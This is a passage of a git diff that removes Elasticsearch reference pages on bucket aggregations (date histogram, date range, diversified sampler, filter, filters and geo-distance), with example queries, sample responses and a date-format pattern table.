---------------------------------- -GET my-index-000001/_search?size=0 -{ - "aggs": { - "by_day": { - "date_histogram": { - "field": "date", - "calendar_interval": "day", - "time_zone": "-01:00" - } - } - } -} ---------------------------------- -// TEST[continued] - -Now the first document falls into the bucket for 30 September 2015, while the -second document falls into the bucket for 1 October 2015: - -[source,console-result] ---------------------------------- -{ - ... - "aggregations": { - "by_day": { - "buckets": [ - { - "key_as_string": "2015-09-30T00:00:00.000-01:00", <1> - "key": 1443574800000, - "doc_count": 1 - }, - { - "key_as_string": "2015-10-01T00:00:00.000-01:00", <1> - "key": 1443661200000, - "doc_count": 1 - } - ] - } - } -} ---------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -<1> The `key_as_string` value represents midnight on each day - in the specified time zone. - -WARNING: Many time zones shift their clocks for daylight savings time. Buckets -close to the moment when those changes happen can have slightly different sizes -than you would expect from the `calendar_interval` or `fixed_interval`. -For example, consider a DST start in the `CET` time zone: on 27 March 2016 at 2am, -clocks were turned forward 1 hour to 3am local time. If you use `day` as the -`calendar_interval`, the bucket covering that day will only hold data for 23 -hours instead of the usual 24 hours for other buckets. The same is true for -shorter intervals, like a `fixed_interval` of `12h`, where you'll have only a 11h -bucket on the morning of 27 March when the DST shift happens. - -[[search-aggregations-bucket-datehistogram-offset]] -==== Offset - -// tag::offset-explanation[] -Use the `offset` parameter to change the start value of each bucket by the -specified positive (`+`) or negative offset (`-`) duration, such as `1h` for -an hour, or `1d` for a day. See <> for more possible time -duration options. - -For example, when using an interval of `day`, each bucket runs from midnight -to midnight. Setting the `offset` parameter to `+6h` changes each bucket -to run from 6am to 6am: -// end::offset-explanation[] - -[source,console] ------------------------------ -PUT my-index-000001/_doc/1?refresh -{ - "date": "2015-10-01T05:30:00Z" -} - -PUT my-index-000001/_doc/2?refresh -{ - "date": "2015-10-01T06:30:00Z" -} - -GET my-index-000001/_search?size=0 -{ - "aggs": { - "by_day": { - "date_histogram": { - "field": "date", - "calendar_interval": "day", - "offset": "+6h" - } - } - } -} ------------------------------ - -// tag::offset-result-intro[] -Instead of a single bucket starting at midnight, the above request groups the -documents into buckets starting at 6am: -// end::offset-result-intro[] - -[source,console-result] ------------------------------ -{ - ... - "aggregations": { - "by_day": { - "buckets": [ - { - "key_as_string": "2015-09-30T06:00:00.000Z", - "key": 1443592800000, - "doc_count": 1 - }, - { - "key_as_string": "2015-10-01T06:00:00.000Z", - "key": 1443679200000, - "doc_count": 1 - } - ] - } - } -} ------------------------------ -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -// tag::offset-note[] -NOTE: The start `offset` of each bucket is calculated after `time_zone` -adjustments have been made. -// end::offset-note[] - -[[date-histogram-keyed-response]] -==== Keyed Response - -Setting the `keyed` flag to `true` associates a unique string key with each -bucket and returns the ranges as a hash rather than an array: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sales_over_time": { - "date_histogram": { - "field": "date", - "calendar_interval": "1M", - "format": "yyyy-MM-dd", - "keyed": true - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "sales_over_time": { - "buckets": { - "2015-01-01": { - "key_as_string": "2015-01-01", - "key": 1420070400000, - "doc_count": 3 - }, - "2015-02-01": { - "key_as_string": "2015-02-01", - "key": 1422748800000, - "doc_count": 2 - }, - "2015-03-01": { - "key_as_string": "2015-03-01", - "key": 1425168000000, - "doc_count": 2 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -[[date-histogram-scripts]] -==== Scripts - -As with the normal <>, -both document-level scripts and -value-level scripts are supported. You can control the order of the returned -buckets using the `order` -settings and filter the returned buckets based on a `min_doc_count` setting -(by default all buckets between the first -bucket that matches documents and the last one are returned). This histogram -also supports the `extended_bounds` -setting, which enables extending the bounds of the histogram beyond the data -itself, and `hard_bounds` that limits the histogram to specified bounds. -For more information, see -<> and -<>. - -[[date-histogram-missing-value]] -===== Missing value - -The `missing` parameter defines how to treat documents that are missing a value. -By default, they are ignored, but it is also possible to treat them as if they -have a value. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "sale_date": { - "date_histogram": { - "field": "date", - "calendar_interval": "year", - "missing": "2000/01/01" <1> - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> Documents without a value in the `publish_date` field will fall into the -same bucket as documents that have the value `2000-01-01`. - -[[date-histogram-order]] -===== Order - -By default the returned buckets are sorted by their `key` ascending, but you can -control the order using -the `order` setting. This setting supports the same `order` functionality as -<>. - -[[date-histogram-aggregate-scripts]] -===== Using a script to aggregate by day of the week - -When you need to aggregate the results by day of the week, use a script that -returns the day of the week: - -[source,console,id=datehistogram-aggregation-script-example] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "dayOfWeek": { - "terms": { - "script": { - "lang": "painless", - "source": "doc['date'].value.dayOfWeekEnum.value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "dayOfWeek": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "7", - "doc_count": 4 - }, - { - "key": "4", - "doc_count": 3 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The response will contain all the buckets having the relative day of -the week as key : 1 for Monday, 2 for Tuesday... 7 for Sunday. diff --git a/docs/reference/aggregations/bucket/daterange-aggregation.asciidoc b/docs/reference/aggregations/bucket/daterange-aggregation.asciidoc deleted file mode 100644 index 6228cfe7da3..00000000000 --- a/docs/reference/aggregations/bucket/daterange-aggregation.asciidoc +++ /dev/null @@ -1,402 +0,0 @@ -[[search-aggregations-bucket-daterange-aggregation]] -=== Date range aggregation -++++ -Date range -++++ - -A range aggregation that is dedicated for date values. The main difference -between this aggregation and the normal -<> -aggregation is that the `from` and `to` values can be expressed in -<> expressions, and it is also possible to specify a date -format by which the `from` and `to` response fields will be returned. -Note that this aggregation includes the `from` value and excludes the `to` value -for each range. - -Example: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "range": { - "date_range": { - "field": "date", - "format": "MM-yyyy", - "ranges": [ - { "to": "now-10M/M" }, <1> - { "from": "now-10M/M" } <2> - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:sales s/now-10M\/M/10-2015/] - -<1> < now minus 10 months, rounded down to the start of the month. -<2> >= now minus 10 months, rounded down to the start of the month. - -In the example above, we created two range buckets, the first will "bucket" all -documents dated prior to 10 months ago and the second will "bucket" all -documents dated since 10 months ago - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "range": { - "buckets": [ - { - "to": 1.4436576E12, - "to_as_string": "10-2015", - "doc_count": 7, - "key": "*-10-2015" - }, - { - "from": 1.4436576E12, - "from_as_string": "10-2015", - "doc_count": 0, - "key": "10-2015-*" - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -WARNING: If a format or date value is incomplete, the date range aggregation -replaces any missing components with default values. See -<>. - -==== Missing Values - -The `missing` parameter defines how documents that are missing a value should -be treated. By default they will be ignored but it is also possible to treat -them as if they had a value. This is done by adding a set of fieldname : -value mappings to specify default values per field. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "range": { - "date_range": { - "field": "date", - "missing": "1976/11/30", - "ranges": [ - { - "key": "Older", - "to": "2016/02/01" - }, <1> - { - "key": "Newer", - "from": "2016/02/01", - "to" : "now/d" - } - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> Documents without a value in the `date` field will be added to the "Older" -bucket, as if they had a date value of "1976-11-30". - -[[date-format-pattern]] -==== Date Format/Pattern - -NOTE: this information was copied from -https://docs.oracle.com/javase/8/docs/api/java/time/format/DateTimeFormatter.html[DateTimeFormatter] - -All ASCII letters are reserved as format pattern letters, which are defined -as follows: - -[options="header"] -|======= -|Symbol |Meaning |Presentation |Examples -|G |era |text |AD; Anno Domini; A -|u |year |year |2004; 04 -|y |year-of-era |year |2004; 04 -|D |day-of-year |number |189 -|M/L |month-of-year |number/text |7; 07; Jul; July; J -|d |day-of-month |number |10 - -|Q/q |quarter-of-year |number/text |3; 03; Q3; 3rd quarter -|Y |week-based-year |year |1996; 96 -|w |week-of-week-based-year |number |27 -|W |week-of-month |number |4 -|E |day-of-week |text |Tue; Tuesday; T -|e/c |localized day-of-week |number/text |2; 02; Tue; Tuesday; T -|F |week-of-month |number |3 - -|a |am-pm-of-day |text |PM -|h |clock-hour-of-am-pm (1-12) |number |12 -|K |hour-of-am-pm (0-11) |number |0 -|k |clock-hour-of-am-pm (1-24) |number |0 - -|H |hour-of-day (0-23) |number |0 -|m |minute-of-hour |number |30 -|s |second-of-minute |number |55 -|S |fraction-of-second |fraction |978 -|A |milli-of-day |number |1234 -|n |nano-of-second |number |987654321 -|N |nano-of-day |number |1234000000 - -|V |time-zone ID |zone-id |America/Los_Angeles; Z; -08:30 -|z |time-zone name |zone-name |Pacific Standard Time; PST -|O |localized zone-offset |offset-O |GMT+8; GMT+08:00; UTC-08:00; -|X |zone-offset 'Z' for zero |offset-X |Z; -08; -0830; -08:30; -083015; -08:30:15; -|x |zone-offset |offset-x |+0000; -08; -0830; -08:30; -083015; -08:30:15; -|Z |zone-offset |offset-Z |+0000; -0800; -08:00; - -|p |pad next |pad modifier |1 -|' |escape for text |delimiter -|'' |single quote |literal |' -|[ |optional section start -|] |optional section end -|# |reserved for future use -|{ |reserved for future use -|} |reserved for future use -|======= - -The count of pattern letters determines the format. - -Text:: The text style is determined based on the number of pattern letters -used. Less than 4 pattern letters will use the short form. Exactly 4 -pattern letters will use the full form. Exactly 5 pattern letters will use -the narrow form. Pattern letters `L`, `c`, and `q` specify the stand-alone -form of the text styles. - -Number:: If the count of letters is one, then the value is output using -the minimum number of digits and without padding. Otherwise, the count of -digits is used as the width of the output field, with the value -zero-padded as necessary. The following pattern letters have constraints -on the count of letters. Only one letter of `c` and `F` can be specified. -Up to two letters of `d`, `H`, `h`, `K`, `k`, `m`, and `s` can be -specified. Up to three letters of `D` can be specified. - -Number/Text:: If the count of pattern letters is 3 or greater, use the -Text rules above. Otherwise use the Number rules above. - -Fraction:: Outputs the nano-of-second field as a fraction-of-second. The -nano-of-second value has nine digits, thus the count of pattern letters is -from 1 to 9. If it is less than 9, then the nano-of-second value is -truncated, with only the most significant digits being output. - -Year:: The count of letters determines the minimum field width below which -padding is used. If the count of letters is two, then a reduced two digit -form is used. For printing, this outputs the rightmost two digits. For -parsing, this will parse using the base value of 2000, resulting in a year -within the range 2000 to 2099 inclusive. If the count of letters is less -than four (but not two), then the sign is only output for negative years -as per `SignStyle.NORMAL`. Otherwise, the sign is output if the pad width is -exceeded, as per `SignStyle.EXCEEDS_PAD`. - -ZoneId:: This outputs the time-zone ID, such as `Europe/Paris`. If the -count of letters is two, then the time-zone ID is output. Any other count -of letters throws `IllegalArgumentException`. - -Zone names:: This outputs the display name of the time-zone ID. If the -count of letters is one, two or three, then the short name is output. If -the count of letters is four, then the full name is output. Five or more -letters throws `IllegalArgumentException`. - -Offset X and x:: This formats the offset based on the number of pattern -letters. One letter outputs just the hour, such as `+01`, unless the -minute is non-zero in which case the minute is also output, such as -`+0130`. Two letters outputs the hour and minute, without a colon, such as -`+0130`. Three letters outputs the hour and minute, with a colon, such as -`+01:30`. Four letters outputs the hour and minute and optional second, -without a colon, such as `+013015`. Five letters outputs the hour and -minute and optional second, with a colon, such as `+01:30:15`. Six or -more letters throws `IllegalArgumentException`. Pattern letter `X` (upper -case) will output `Z` when the offset to be output would be zero, -whereas pattern letter `x` (lower case) will output `+00`, `+0000`, or -`+00:00`. - -Offset O:: This formats the localized offset based on the number of -pattern letters. One letter outputs the short form of the localized -offset, which is localized offset text, such as `GMT`, with hour without -leading zero, optional 2-digit minute and second if non-zero, and colon, -for example `GMT+8`. Four letters outputs the full form, which is -localized offset text, such as `GMT, with 2-digit hour and minute -field, optional second field if non-zero, and colon, for example -`GMT+08:00`. Any other count of letters throws -`IllegalArgumentException`. - -Offset Z:: This formats the offset based on the number of pattern letters. -One, two or three letters outputs the hour and minute, without a colon, -such as `+0130`. The output will be `+0000` when the offset is zero. -Four letters outputs the full form of localized offset, equivalent to -four letters of Offset-O. The output will be the corresponding localized -offset text if the offset is zero. Five letters outputs the hour, -minute, with optional second if non-zero, with colon. It outputs `Z` if -the offset is zero. Six or more letters throws IllegalArgumentException. - -Optional section:: The optional section markers work exactly like calling -`DateTimeFormatterBuilder.optionalStart()` and -`DateTimeFormatterBuilder.optionalEnd()`. - -Pad modifier:: Modifies the pattern that immediately follows to be padded -with spaces. The pad width is determined by the number of pattern letters. -This is the same as calling `DateTimeFormatterBuilder.padNext(int)`. - -For example, `ppH` outputs the hour-of-day padded on the left with spaces to a width of 2. - -Any unrecognized letter is an error. Any non-letter character, other than -`[`, `]`, `{`, `}`, `#` and the single quote will be output directly. -Despite this, it is recommended to use single quotes around all characters -that you want to output directly to ensure that future changes do not -break your application. - - -[[time-zones]] -==== Time zone in date range aggregations - -Dates can be converted from another time zone to UTC by specifying the -`time_zone` parameter. - -Time zones may either be specified as an ISO 8601 UTC offset (e.g. +01:00 or --08:00) or as one of the time zone ids from the TZ database. - -The `time_zone` parameter is also applied to rounding in date math expressions. -As an example, to round to the beginning of the day in the CET time zone, you -can do the following: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "range": { - "date_range": { - "field": "date", - "time_zone": "CET", - "ranges": [ - { "to": "2016/02/01" }, <1> - { "from": "2016/02/01", "to" : "now/d" }, <2> - { "from": "now/d" } - ] - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -<1> This date will be converted to `2016-02-01T00:00:00.000+01:00`. -<2> `now/d` will be rounded to the beginning of the day in the CET time zone. - -==== Keyed Response - -Setting the `keyed` flag to `true` will associate a unique string key with each -bucket and return the ranges as a hash rather than an array: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "range": { - "date_range": { - "field": "date", - "format": "MM-yyy", - "ranges": [ - { "to": "now-10M/M" }, - { "from": "now-10M/M" } - ], - "keyed": true - } - } - } -} --------------------------------------------------- -// TEST[setup:sales s/now-10M\/M/10-2015/] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "range": { - "buckets": { - "*-10-2015": { - "to": 1.4436576E12, - "to_as_string": "10-2015", - "doc_count": 7 - }, - "10-2015-*": { - "from": 1.4436576E12, - "from_as_string": "10-2015", - "doc_count": 0 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -It is also possible to customize the key for each range: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "range": { - "date_range": { - "field": "date", - "format": "MM-yyy", - "ranges": [ - { "from": "01-2015", "to": "03-2015", "key": "quarter_01" }, - { "from": "03-2015", "to": "06-2015", "key": "quarter_02" } - ], - "keyed": true - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "range": { - "buckets": { - "quarter_01": { - "from": 1.4200704E12, - "from_as_string": "01-2015", - "to": 1.425168E12, - "to_as_string": "03-2015", - "doc_count": 5 - }, - "quarter_02": { - "from": 1.425168E12, - "from_as_string": "03-2015", - "to": 1.4331168E12, - "to_as_string": "06-2015", - "doc_count": 2 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] diff --git a/docs/reference/aggregations/bucket/diversified-sampler-aggregation.asciidoc b/docs/reference/aggregations/bucket/diversified-sampler-aggregation.asciidoc deleted file mode 100644 index 4b829255db3..00000000000 --- a/docs/reference/aggregations/bucket/diversified-sampler-aggregation.asciidoc +++ /dev/null @@ -1,204 +0,0 @@ -[[search-aggregations-bucket-diversified-sampler-aggregation]] -=== Diversified sampler aggregation -++++ -Diversified sampler -++++ - -Like the `sampler` aggregation this is a filtering aggregation used to limit any sub aggregations' processing to a sample of the top-scoring documents. -The `diversified_sampler` aggregation adds the ability to limit the number of matches that share a common value such as an "author". - -NOTE: Any good market researcher will tell you that when working with samples of data it is important -that the sample represents a healthy variety of opinions rather than being skewed by any single voice. -The same is true with aggregations and sampling with these diversify settings can offer a way to remove the bias in your content (an over-populated geography, -a large spike in a timeline or an over-active forum spammer). - - -.Example use cases: -* Tightening the focus of analytics to high-relevance matches rather than the potentially very long tail of low-quality matches -* Removing bias from analytics by ensuring fair representation of content from different sources -* Reducing the running cost of aggregations that can produce useful results using only samples e.g. `significant_terms` - -A choice of `field` or `script` setting is used to provide values used for de-duplication and the `max_docs_per_value` setting controls the maximum -number of documents collected on any one shard which share a common value. The default setting for `max_docs_per_value` is 1. - -The aggregation will throw an error if the choice of `field` or `script` produces multiple values for a single document (de-duplication using multi-valued fields is not supported due to efficiency concerns). - - -Example: - -We might want to see which tags are strongly associated with `#elasticsearch` on StackOverflow -forum posts but ignoring the effects of some prolific users with a tendency to misspell #Kibana as #Cabana. - -[source,console] --------------------------------------------------- -POST /stackoverflow/_search?size=0 -{ - "query": { - "query_string": { - "query": "tags:elasticsearch" - } - }, - "aggs": { - "my_unbiased_sample": { - "diversified_sampler": { - "shard_size": 200, - "field": "author" - }, - "aggs": { - "keywords": { - "significant_terms": { - "field": "tags", - "exclude": [ "elasticsearch" ] - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:stackoverflow] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "my_unbiased_sample": { - "doc_count": 151, <1> - "keywords": { <2> - "doc_count": 151, - "bg_count": 650, - "buckets": [ - { - "key": "kibana", - "doc_count": 150, - "score": 2.213, - "bg_count": 200 - } - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] -// TESTRESPONSE[s/2.213/$body.aggregations.my_unbiased_sample.keywords.buckets.0.score/] - -<1> 151 documents were sampled in total. -<2> The results of the significant_terms aggregation are not skewed by any single author's quirks because we asked for a maximum of one post from any one author in our sample. - -==== Scripted example: - -In this scenario we might want to diversify on a combination of field values. We can use a `script` to produce a hash of the -multiple values in a tags field to ensure we don't have a sample that consists of the same repeated combinations of tags. - -[source,console] --------------------------------------------------- -POST /stackoverflow/_search?size=0 -{ - "query": { - "query_string": { - "query": "tags:kibana" - } - }, - "aggs": { - "my_unbiased_sample": { - "diversified_sampler": { - "shard_size": 200, - "max_docs_per_value": 3, - "script": { - "lang": "painless", - "source": "doc['tags'].hashCode()" - } - }, - "aggs": { - "keywords": { - "significant_terms": { - "field": "tags", - "exclude": [ "kibana" ] - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:stackoverflow] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "my_unbiased_sample": { - "doc_count": 6, - "keywords": { - "doc_count": 6, - "bg_count": 650, - "buckets": [ - { - "key": "logstash", - "doc_count": 3, - "score": 2.213, - "bg_count": 50 - }, - { - "key": "elasticsearch", - "doc_count": 3, - "score": 1.34, - "bg_count": 200 - } - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] -// TESTRESPONSE[s/2.213/$body.aggregations.my_unbiased_sample.keywords.buckets.0.score/] -// TESTRESPONSE[s/1.34/$body.aggregations.my_unbiased_sample.keywords.buckets.1.score/] - -==== shard_size - -The `shard_size` parameter limits how many top-scoring documents are collected in the sample processed on each shard. -The default value is 100. - -==== max_docs_per_value -The `max_docs_per_value` is an optional parameter and limits how many documents are permitted per choice of de-duplicating value. -The default setting is "1". - - -==== execution_hint - -The optional `execution_hint` setting can influence the management of the values used for de-duplication. -Each option will hold up to `shard_size` values in memory while performing de-duplication but the type of value held can be controlled as follows: - - - hold field values directly (`map`) - - hold ordinals of the field as determined by the Lucene index (`global_ordinals`) - - hold hashes of the field values - with potential for hash collisions (`bytes_hash`) - -The default setting is to use <> if this information is available from the Lucene index and reverting to `map` if not. -The `bytes_hash` setting may prove faster in some cases but introduces the possibility of false positives in de-duplication logic due to the possibility of hash collisions. -Please note that Elasticsearch will ignore the choice of execution hint if it is not applicable and that there is no backward compatibility guarantee on these hints. - -==== Limitations - -[[div-sampler-breadth-first-nested-agg]] -===== Cannot be nested under `breadth_first` aggregations -Being a quality-based filter the diversified_sampler aggregation needs access to the relevance score produced for each document. -It therefore cannot be nested under a `terms` aggregation which has the `collect_mode` switched from the default `depth_first` mode to `breadth_first` as this discards scores. -In this situation an error will be thrown. - -===== Limited de-dup logic. -The de-duplication logic applies only at a shard level so will not apply across shards. - -[[spec-syntax-geo-date-fields]] -===== No specialized syntax for geo/date fields -Currently the syntax for defining the diversifying values is defined by a choice of `field` or -`script` - there is no added syntactical sugar for expressing geo or date units such as "7d" (7 -days). This support may be added in a later release and users will currently have to create these -sorts of values using a script. diff --git a/docs/reference/aggregations/bucket/filter-aggregation.asciidoc b/docs/reference/aggregations/bucket/filter-aggregation.asciidoc deleted file mode 100644 index a3cf365d317..00000000000 --- a/docs/reference/aggregations/bucket/filter-aggregation.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ -[[search-aggregations-bucket-filter-aggregation]] -=== Filter aggregation -++++ -Filter -++++ - -Defines a single bucket of all the documents in the current document set context that match a specified filter. Often this will be used to narrow down the current aggregation context to a specific set of documents. - -Example: - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "t_shirts": { - "filter": { "term": { "type": "t-shirt" } }, - "aggs": { - "avg_price": { "avg": { "field": "price" } } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -In the above example, we calculate the average price of all the products that are of type t-shirt. - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "t_shirts": { - "doc_count": 3, - "avg_price": { "value": 128.33333333333334 } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] diff --git a/docs/reference/aggregations/bucket/filters-aggregation.asciidoc b/docs/reference/aggregations/bucket/filters-aggregation.asciidoc deleted file mode 100644 index b7807c19029..00000000000 --- a/docs/reference/aggregations/bucket/filters-aggregation.asciidoc +++ /dev/null @@ -1,190 +0,0 @@ -[[search-aggregations-bucket-filters-aggregation]] -=== Filters aggregation -++++ -Filters -++++ - -Defines a multi bucket aggregation where each bucket is associated with a -filter. Each bucket will collect all documents that match its associated -filter. - -Example: - -[source,console] --------------------------------------------------- -PUT /logs/_bulk?refresh -{ "index" : { "_id" : 1 } } -{ "body" : "warning: page could not be rendered" } -{ "index" : { "_id" : 2 } } -{ "body" : "authentication error" } -{ "index" : { "_id" : 3 } } -{ "body" : "warning: connection timed out" } - -GET logs/_search -{ - "size": 0, - "aggs" : { - "messages" : { - "filters" : { - "filters" : { - "errors" : { "match" : { "body" : "error" }}, - "warnings" : { "match" : { "body" : "warning" }} - } - } - } - } -} --------------------------------------------------- - -In the above example, we analyze log messages. The aggregation will build two -collection (buckets) of log messages - one for all those containing an error, -and another for all those containing a warning. - -Response: - -[source,console-result] --------------------------------------------------- -{ - "took": 9, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "messages": { - "buckets": { - "errors": { - "doc_count": 1 - }, - "warnings": { - "doc_count": 2 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 9/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -==== Anonymous filters - -The filters field can also be provided as an array of filters, as in the -following request: - -[source,console] --------------------------------------------------- -GET logs/_search -{ - "size": 0, - "aggs" : { - "messages" : { - "filters" : { - "filters" : [ - { "match" : { "body" : "error" }}, - { "match" : { "body" : "warning" }} - ] - } - } - } -} --------------------------------------------------- -// TEST[continued] - -The filtered buckets are returned in the same order as provided in the -request. The response for this example would be: - -[source,console-result] --------------------------------------------------- -{ - "took": 4, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "messages": { - "buckets": [ - { - "doc_count": 1 - }, - { - "doc_count": 2 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 4/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] - -[[other-bucket]] -==== `Other` Bucket - -The `other_bucket` parameter can be set to add a bucket to the response which will contain all documents that do -not match any of the given filters. The value of this parameter can be as follows: - -`false`:: Does not compute the `other` bucket -`true`:: Returns the `other` bucket either in a bucket (named `_other_` by default) if named filters are being used, - or as the last bucket if anonymous filters are being used - -The `other_bucket_key` parameter can be used to set the key for the `other` bucket to a value other than the default `_other_`. Setting -this parameter will implicitly set the `other_bucket` parameter to `true`. - -The following snippet shows a response where the `other` bucket is requested to be named `other_messages`. - -[source,console] --------------------------------------------------- -PUT logs/_doc/4?refresh -{ - "body": "info: user Bob logged out" -} - -GET logs/_search -{ - "size": 0, - "aggs" : { - "messages" : { - "filters" : { - "other_bucket_key": "other_messages", - "filters" : { - "errors" : { "match" : { "body" : "error" }}, - "warnings" : { "match" : { "body" : "warning" }} - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -The response would be something like the following: - -[source,console-result] --------------------------------------------------- -{ - "took": 3, - "timed_out": false, - "_shards": ..., - "hits": ..., - "aggregations": { - "messages": { - "buckets": { - "errors": { - "doc_count": 1 - }, - "warnings": { - "doc_count": 2 - }, - "other_messages": { - "doc_count": 1 - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 3/"took": $body.took/] -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards/] -// TESTRESPONSE[s/"hits": \.\.\./"hits": $body.hits/] diff --git a/docs/reference/aggregations/bucket/geodistance-aggregation.asciidoc b/docs/reference/aggregations/bucket/geodistance-aggregation.asciidoc deleted file mode 100644 index 202ef696053..00000000000 --- a/docs/reference/aggregations/bucket/geodistance-aggregation.asciidoc +++ /dev/null @@ -1,253 +0,0 @@ -[[search-aggregations-bucket-geodistance-aggregation]] -=== Geo-distance aggregation -++++ -Geo-distance -++++ - -A multi-bucket aggregation that works on `geo_point` fields and conceptually works very similar to the <> aggregation. The user can define a point of origin and a set of distance range buckets. The aggregation evaluate the distance of each document value from the origin point and determines the buckets it belongs to based on the ranges (a document belongs to a bucket if the distance between the document and the origin falls within the distance range of the bucket). - -[source,console] --------------------------------------------------- -PUT /museums -{ - "mappings": { - "properties": { - "location": { - "type": "geo_point" - } - } - } -} - -POST /museums/_bulk?refresh -{"index":{"_id":1}} -{"location": "52.374081,4.912350", "name": "NEMO Science Museum"} -{"index":{"_id":2}} -{"location": "52.369219,4.901618", "name": "Museum Het Rembrandthuis"} -{"index":{"_id":3}} -{"location": "52.371667,4.914722", "name": "Nederlands Scheepvaartmuseum"} -{"index":{"_id":4}} -{"location": "51.222900,4.405200", "name": "Letterenhuis"} -{"index":{"_id":5}} -{"location": "48.861111,2.336389", "name": "Musée du Louvre"} -{"index":{"_id":6}} -{"location": "48.860000,2.327000", "name": "Musée d'Orsay"} - -POST /museums/_search?size=0 -{ - "aggs": { - "rings_around_amsterdam": { - "geo_distance": { - "field": "location", - "origin": "52.3760, 4.894", - "ranges": [ - { "to": 100000 }, - { "from": 100000, "to": 300000 }, - { "from": 300000 } - ] - } - } - } -} --------------------------------------------------- - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "rings_around_amsterdam": { - "buckets": [ - { - "key": "*-100000.0", - "from": 0.0, - "to": 100000.0, - "doc_count": 3 - }, - { - "key": "100000.0-300000.0", - "from": 100000.0, - "to": 300000.0, - "doc_count": 1 - }, - { - "key": "300000.0-*", - "from": 300000.0, - "doc_count": 2 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"_shards": $body._shards,"hits":$body.hits,"timed_out":false,/] - -The specified field must be of type `geo_point` (which can only be set explicitly in the mappings). And it can also hold an array of `geo_point` fields, in which case all will be taken into account during aggregation. The origin point can accept all formats supported by the <>: - -* Object format: `{ "lat" : 52.3760, "lon" : 4.894 }` - this is the safest format as it is the most explicit about the `lat` & `lon` values -* String format: `"52.3760, 4.894"` - where the first number is the `lat` and the second is the `lon` -* Array format: `[4.894, 52.3760]` - which is based on the `GeoJson` standard and where the first number is the `lon` and the second one is the `lat` - -By default, the distance unit is `m` (meters) but it can also accept: `mi` (miles), `in` (inches), `yd` (yards), `km` (kilometers), `cm` (centimeters), `mm` (millimeters). - -[source,console] --------------------------------------------------- -POST /museums/_search?size=0 -{ - "aggs": { - "rings": { - "geo_distance": { - "field": "location", - "origin": "52.3760, 4.894", - "unit": "km", <1> - "ranges": [ - { "to": 100 }, - { "from": 100, "to": 300 }, - { "from": 300 } - ] - } - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> The distances will be computed in kilometers - -There are two distance calculation modes: `arc` (the default), and `plane`. The `arc` 